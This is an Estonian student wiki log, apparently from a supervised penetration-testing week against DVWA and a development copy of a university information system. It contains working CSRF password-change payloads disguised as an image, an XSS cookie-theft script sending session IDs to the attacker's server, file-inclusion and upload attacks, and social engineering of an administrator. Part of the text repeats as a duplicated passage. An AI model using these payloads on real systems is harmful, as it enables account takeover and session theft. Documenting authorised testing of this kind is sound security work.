Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.

Muutsime password ja password_check lahtrite väärtused järgnevaks: "test123" ehk kasutaja uus parool peale rünnakut.

Lahtrites muutsime user_id'd sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.

Kõik vormi lahtrite tüübid määrasime peidetud ehk "hidden", et poleks midagi näidata.

Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist.
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.

Lisasime CSS koodi Submit nupu ära peitmiseks.
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.

Salvestasime faili ära kui "screen1.jpg" fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.

Faili sisu:
<source lang="html4strict">
<html>
<head>
<style type="text/css">
#Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }
</style>
</head>
<body>
<body onload="document.forms.setPasswordForm.submit();">
<form name="setPasswordForm" id="setPasswordForm"
action="https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&continue=/auth/logout"
method="post">
<input type="hidden" name="user_id" value="2227" id="user_id" />
<input type="hidden" name="continue" value="%2Fet%2Fsetting%3Fuser_id%3D2227" id="continue" />
<input type="hidden" name="password" id="password" value="test123" />
<input type="hidden" name="password_check" id="password_check" value="test123" />
<input type="submit" name="Setpassword" id="Setpassword" value="Muuda salasõna" />
</form>
</body>
</html>
</source>

[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]

Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.
<pre>
AddType application/x-httpd-php .php .jpg
</pre>

Laadisime mõlemad failid Enose veebiserverisse avalikult.

Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki.
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle.
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail.
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja.
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud "test123"-ks ja me saime ligipääsu administraatori õigustes kontole.
Rünnak oli edukas.
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]

Andsime teada Valterile teada, et tegelikult tegime salajase ründe.
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha.
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug'iga.

Kuna tegu oli ÕIS'i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.

=== Taavi tegevus ===
====Burp suite====

Esimese asjane peale Burp suite käivitamist. Tabilt proxy ->intercept ->intercept off<br>
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)<br>
Proxy -> options alt lülitada sisse proxy listner pordile 8080 .<br>
Ohvri valimine <br>
Valida intruder -> target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.<br>
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.<br>
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.<br>site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.<br>
Targer->scope -> exclude frome scope ja veenduda at välja on arvatud logout laused.<br>
Spideringi sisselülitamine <br>
Valida tab Spide ning sealt panna linnuke kasti spider running.<br>
Ning oledki valmis saama laheküljelt infot.<br>
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.<br>
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.

====Nessuse algkäivitamine====
Valida backtrackist vulnerability scannerite alt nessus ning edasi nessus register .<br> Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.<br> Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)<br>
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)<br>
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.<br>
Järgnevalt valida nessus start.<br>
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.<br>
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.

=== Matise tegevus ===

====Väike upload tegevus, mis võiks olla teisiti====
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.
Proovisime üles laadida:
<li>filmi
<li>exe
<li>jpm faile
<br>kõik läks läbi ja sai uploadida.
<br>Sellises kohas võiks olla süsteem tehtud <b>whitelisti</b> põhimõttel,
<br>et lubatud oleks ainult:
<li>.doc
<li>.docx
<li>.pdf

=== Sanderi tegevus ===
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]
Backtarcki keskkonnas sai testitud programmi w3af.

==== Backtrack: w3af ====
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]
Võimalik kätte saada SSL Certificate.
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:
https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?
username=<font color="red">KASUTAJANIMI</font>&continue=&Login=Logi sisse&pw=<font color="red">PAROOL</font>
Programmi sisestatud andmetega ka mitte:
Configuration -> HTTP Config -> Basic HTTP Authentication:
basicAuthUser: <font color="red">KASUTAJANIMI</font>
basicAuthPass: <font color="red">PAROOL</font>
basicAuthDomain: http://itcollege.dev.ois.ee
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:
Configuration -> HTTP Config -> Cookies
cookieJarFile: /root/Desktop/<font color="red">ois_cookie.txt</font>
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:
# Netscape HTTP Cookie File
.dev.ois.ee TRUE / FALSE 1731510001 itcollege_OIS_SESSION_ID <font color="red">870aqllryuw3cmf6cv8ellha03</font>
Esimene rida on nõutav! Teiste tähendused:
domain - The domain that created and that can read the variable.
flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.
This value is set automatically by the browser, depending on the value you set for domain.
path - The path within the domain that the variable is valid for.
secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.
expiration - The UNIX time that the variable will expire on.
name - The name of the variable.
value - The value of the variable.
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:
Edit -> Preferences -> Privacy -> History -> remove individual cookies
Search: itcollege.dev.ois.ee
Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID

Skänneerimine:
<ul>
<li>The page language is: en</li>
<li>The URL: "https://itcollege.dev.ois.ee/" has a "<form>" element with auto-complete enabled.</li>
<li>A comment with the string "<p>tunne end kui koolis</p>" was found in: "https://itcollege.dev.ois.ee/".</li>
<li>Found a form login. The action of the form is: "https://itcollege.dev.ois.ee/auth/login".</li>
The username field to be used is: "username".
The password field to be used is: "pw".
<li><font color="red">Found authentication credentials to: "https://itcollege.dev.ois.ee/auth/login". A correct user and password combination is: Administrador/6666666</font></li>
Antud kasutaja ja parooliga sisse ei saanud.
<li>The URL: "https://itcollege.dev.ois.ee/" returned a response that may contain a "SHA1" hash. The hash is: "c7b39896de5f296b5a44c2dfcd9f0600b2cf424d". This is uncommon and requires human verification.</li>
Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.
<li>The URL: "https://itcollege.dev.ois.ee/" sent these cookies:</li>
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/
<li>The SMTP settings in emailReport plugin seem to be incorrect. Original error: "[Errno 111] Connection refused".</li>
Kui tuleb see veateade, siis skänn katkeb.
<li><font color="red">The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):</font></li>
The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
<li><font color="red">SQL injection in a Unknown database was found at: "https://itcollege.dev.ois.ee/auth/login", using HTTP method POST.</font></li>
The sent post-data was: "username=John8212&security_key_sis_global=d'z"0&Login=Logi%20sisse&continue=56&pw=FrAmE30.".
The modified parameter was "security_key_sis_global". This vulnerability was found in the request with id 390.
<li>Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt</li>
User-agent: *
Disallow: /
Allow: /curriculum
Allow: /subject
Allow: /diploma
Allow: /schedule/ical
</ul>

== 4. päev - Presentatsiooni tegemine ja esitlemine ==

Koostasime presentatsiooni ja esitlemine.

[[Media:Security_team_presentation.ppt]]

== Arvamused intensiivõppe nädala kohta ==

Sander: Õppisime erinevaid testprogramme ja testkeskkondi kasutama, mida varem kunagi kasutanud polnud. Suutsime avastada nii mõnegi vea, mida varem avastatud ei olnud. Usun, et ÕIS on nüüd kasvõi veidigi turvalisem. Soovitan ka teistele tudengitele intensiivõppenädalal osalemist, kuna valides õige teema võib olla päris huvitav tegeleda millegagi, mida varem teinud pole või mida tegelikult lihtsalt ei ole lubatud teha.

Urmo: Intensiivõppe nädalaga sai õpitud nii mõndagi huvitavat veebiturve ja selle testimise kohta. Kuna aega oli vähe, siis sai hulgaliselt kogemust ja oskust reaalselt planeerida mahukat tööd täiesti nullist kuni reaalse rakendatava tulemuseni ning pani proovile stressitaluvuse tõestamaks pinge all jätkusuutlikku töötamist. Intensiivõppe nädalal võiksid osaleda kõik, kellel väheke tahtmist midagi uurida ja korda saata ning saada reaalset töökogemust ennem töömaailma sukeldumist.

== Tegijad ==
:Alo Konno A21
:Urmo Lihten A21
:Taavi Podžuks A22
:Matis Alliksoo A22
:Sander Saarm A22

== Juhendajad ==
Täname oma juhendajaid:
:Mart Mangus
:Margus Ernits
:Valter Kungla

Security team

2012-03-30T21:08:17Z

Ulihten: /* Burpsuite v1.4 */

== 1. päev - Materjalidega tutvumine ==

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

::A1: Injection - Urmo
::A2: Cross-Site Scripting (XSS) - Alo
::A3: Broken Authentication and Session Management - Sander
::A4: Insecure Direct Object References - Alo
::A5: Cross-Site Request Forgery (CSRF) - Taavi
::A6: Security Misconfiguration - Matis
::A7: Insecure Cryptographic Storage - Matis
::A8: Failure to Restrict URL Access - Urmo
::A9: Insufficient Transport Layer Protection - Taavi
::A10: Unvalidated Redirects and Forwards - Sander

Sanderi konspekt: [[Media:Ois_materjal.pdf]] <br>
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] <br>
Taavi esitlus [[Media:A9.pdf]] <br>
Taavi esitlus [[Media:A5.pdf]] <br>
Matise esitlus [[Media:Insecure Cryptographic Storage.pdf]] <br>
Matise esitlus [[Media:Security Misconfiguration.pdf]] <br>
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] <br>

== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==
===Security Team tegevusplaan===
1. Päev
:1.1 Tutvuda OWASP’iga.
:1.2 Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.
:1.3 Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.
2. Päev
:2.1 Esitada tiimi tegevusplaan.
:2.2 Tutvuda turvariskidega natuke põhjalikumalt.
:2.3 Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.
:2.4 Täiendada esimese päeva ettekannet.
3. Päev
:3.1 Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.
:3.2 Saadud tulemuste dokumenteerimine.
4. Päev
:4.1 Saadud tulemuste esitlemine ettekandega
5. Päev
:5.1 Tulemuste parandamine wiki’s.

=== Alo tegevus ===
==== Acunetix Web Vulnerability Scanner v. 8 automaatskännimise tööriistaga tutvumine ====
http://www.acunetix.com/support/vulnerability-checks.htm
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting
http://www.youtube.com/watch?v=SG1cvGQ971g
http://www.isecom.org/research.html
http://evuln.com/tools/
http://sectools.org/tag/web-scanners/
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/
http://www.acunetix.com/vulnerability-scanner/getting-started.htm

Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:
Acunetix Web Vulnerability Scanner v. 8
http://www.acunetix.com/vulnerability-scanner/

Pärast programmi installimist tuli seadistada skännimine, valisime keskmise põhjalikkusega skänni.

Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.

Antud programm võimaldab skännida:
:Cross-Site Scripting (XSS)
:SQL Injection (blind test)
:File inclusion
:Code Execution
:LDAP Injection
:Cross Frame Scripting
:SQL Injection (error msg. test)
:CRLF Injection
:Directory Travelsal
:XPath Injection
:URL Redirection
:Application Error Message

Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.

=== Urmo tegevus ===

Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.

Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application'i.

==== Brute Force (DVWA) ====
Käsitsi välja uuritud login andmed:
kasutajanimi: admin
parool: password

===== Fireforce plugin Firefoxis =====
Tekitatud sai ka password list faili pass.txt.

Kasutusel oli Firefox brauser, kuhu installisime plugin'a Fireforce.
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .

Panime kasutajanimeks "admin" ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.

Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud.
Selleks sai sõna "incorrect".

Määrata ära tuli ka, et mitu päringut sekundis tehakse.

Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada.

Päringute tegemise kiirus vähem kui 1 päring/sekundis.

Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.

Kasutasime ka videos näidatud "@ DICTIONARY" teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.

Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.

===== Burpsuite v1.4 =====
Burpsuite v1.4 on Samurai WTF'il olemas juba sees ja saab kohe käima panna.
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI'st]]

Programm on juba loomult keerulisem.

Burpsuite'iga tuleb panna käima proxy server localhost'is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.

Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine.

Läbi proxy serveri tuleb BurpSuite'ile kohale vastava veebilehe Header sisselogimise kohta.

Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.

Payload'i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.

Ründe stiiliks määrata Pitchfork.

Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.

Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.

Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -> Start Attack, mis siis alustas rünnet.

Kahjuks ka see rünne ei toiminud teadmata põhjusel.

Proovitud sai ka lühemate nimekirjadega aga edutult.

Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt.

Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5.sekundiks sisselogimine ära vastava teatega.

Brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.

Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.

==== CSRF - Cross-site request forgery ====
Katsetamine toimub koos Taaviga.

Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.

Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.

Lõime uue faili - crosssite.txt

DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.
Võtsime lehe Source Code lahti
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.
Current Password lahtri jätsime samaks.
Ülejäänud kahe uue passwordi fieldi type'iks määrasime "Hidden" ja value'deks "admin".
Salvestasime faili ja käivitasime selle.
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna ".

Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.

=== Taavi tegevus ===

Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.

=== Matise tegevus ===
==== Reflected Cross Site Scripting (XSS) ====
<ul>
<li>Lehel on selline Form:</li>
[[Image:Xsstesting.jpg|Location="left"|Caption|]]
<br>Form väljastab : Hello „sisestatud nimi“
<li>Easy puhul:</li>
<li>Saab sisestada textboxi skripti:</li>
<script>
alert(document.cookie.match(/PHPSESSID=[^;\]+/));
</script>
<li>Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.</li>
<li>Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: </li>
<script>
this.document.location.href = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);
</script>
<li>Saab kohe enda veebiserveri logidest näha Session ID’d.
<br>Näide logist:</li>
/var/log/apache2/access.log
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] "GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1" 404 404 "-" <br> "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11"
<li>Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.</li>
</ul>

=== Sanderi tegevus ===
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]

SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).
==== Faili üleslaadimine: madal tase ====
<ul>
<li><b>DVWA Security</b> määrata: Low -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess</li>
Üleslaetavasse *.php faili saab kirjutada php koodi:
<?php var_dump($_REQUEST, $_SERVER); ?>
<li>Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:</li>
esimeses massiivis "PHPSESSID" ("2b1ae19446cfde009664f18df51b6ec1") ja turvatase "security" ("low");
teises "HTTP_COOKIE", milles on eelnevadki andmed; asukoht "PATH", "SERVER_SOFTWARE", "SERVER_NAME",
"SERVER_ADDR" ("127.42.84.1"), "SERVER_PORT" ("80"), "REMOTE_ADDR" ("127.42.84.1"), "REMOTE_PORT" ("53425") jpm.
</ul>

==== Faili üleslaadimine: keskmine tase ====
<ul>
<li><b>DVWA Security</b> määrata: Medium -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida ei saa näiteks järgnevates formaatides faile:</li>
.htaccess
.php .html .pdf
.gif .png .bmp
.svg .swf
.tif .tiff .exif
.raw .cgm
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
<li>Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:</li>
http://dvwa/hackable/uploads/*.jpg
<li>Skripti käivitamiseks tuleb kasutada "?page=" ja faili asukoht:</li>
http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg
Kuvatakse php skripti tulemus.
Kommentaar: "?page=" kasutamine võetud menüüvalikust: <b>File Inclusion</b>
<li>"?page=" abil saab vaadata kasutajate nimesid:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
<li>Paroole vaadata ei saa, selleks õigused puuduvad:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow
</ul>

==== Faili üleslaadimine: kõrge tase ====
<ul>
<li><b>DVWA Security</b> määrata: High -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.</li>
<li>Skripti käivitamiseks ei piisa ka "?page=" kasutamisest. Igal juhul on vastus selline:</li>
ERROR: File not found!
<li>Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:</li>
http://www.motobit.com/util/base64-decoder-encoder.asp
<li>Moodustades loodud faili asukohast kood ja kasutades</li>
data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:
http://dvwa/hackable/uploads/*.jpg
</ul>

== 3. päev - Dev-ÕIS'i turvatestimine==

=== Alo tegevus ===
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.<br>
Faile saab alla laadida enda profiili all õppesooritustes.<br>
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.<br>
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.<br>
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.<br>
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.<br>
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.<br>

=== Urmo tegevus ===
====Subgraph Vega ====
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.
Programm on Java põhine graafilise liidesega ja töötab Linux'i, OS X ja Windowsi peal.

[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.

Alustasime uut skänni (Start New Scan).
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.

Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised.

Me lisasime ainult küpsise (cookie) sisu:
<pre>
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221
</pre>
ning Finish.

[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).

Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000.

Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script'ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body nõrkust.

Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID'sid ja parameetreid ära oma pealkirjades.
Õnneks parameetritega väljad olid veebilehel korralikult ära escape'itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.

ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.

==== Wapiti ====
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti.
(Koduleht: http://wapiti.sourceforge.net/)

Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS'iga midagi teha.

==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====
=====1. katse - ÕISi keskkkonna keelevahetus =====
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]

Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.

Võtsime dev-ÕIS'i Source Code'ist välja vastava formi osa ja panime eraldi html faili.
Koristasime mittevajaliku disaini koodi juurest ära.
Muutsime form'i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks "en" ehk inglise keelne keskkond tekiks.
Panime koodi enose veebiserverisse üles nimega ois.html.

Faili sisu:
<source lang="html4strict">
<form id="settingsForm" method="post" action="https://itcollege.dev.ois.ee/setting/edit?user_id=2198"
enctype="application/x-www-form-urlencoded">
<input type="hidden" AUTOCOMPLETE="off" name="default_language"value="en">
<br>
<input type="submit" value="Salvesta seaded" name="Savesettings">
</form>
</source>
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.

Katsetas koodi enda konto peal Taavi.

=====2. katse - ÕIS'i kasutaja parooli muutmine =====

[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.

Selle jaoks uurisime välja, kus asub dev-ÕIS'i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.

Muutsime password ja password_check lahtrite väärtused järgnevaks: "test123" ehk kasutaja uus parool peale rünnakut.

Lahtrites muutsime user_id'd sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.

Kõik vormi lahtrite tüübid määrasime peidetud ehk "hidden", et poleks midagi näidata.

Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist.
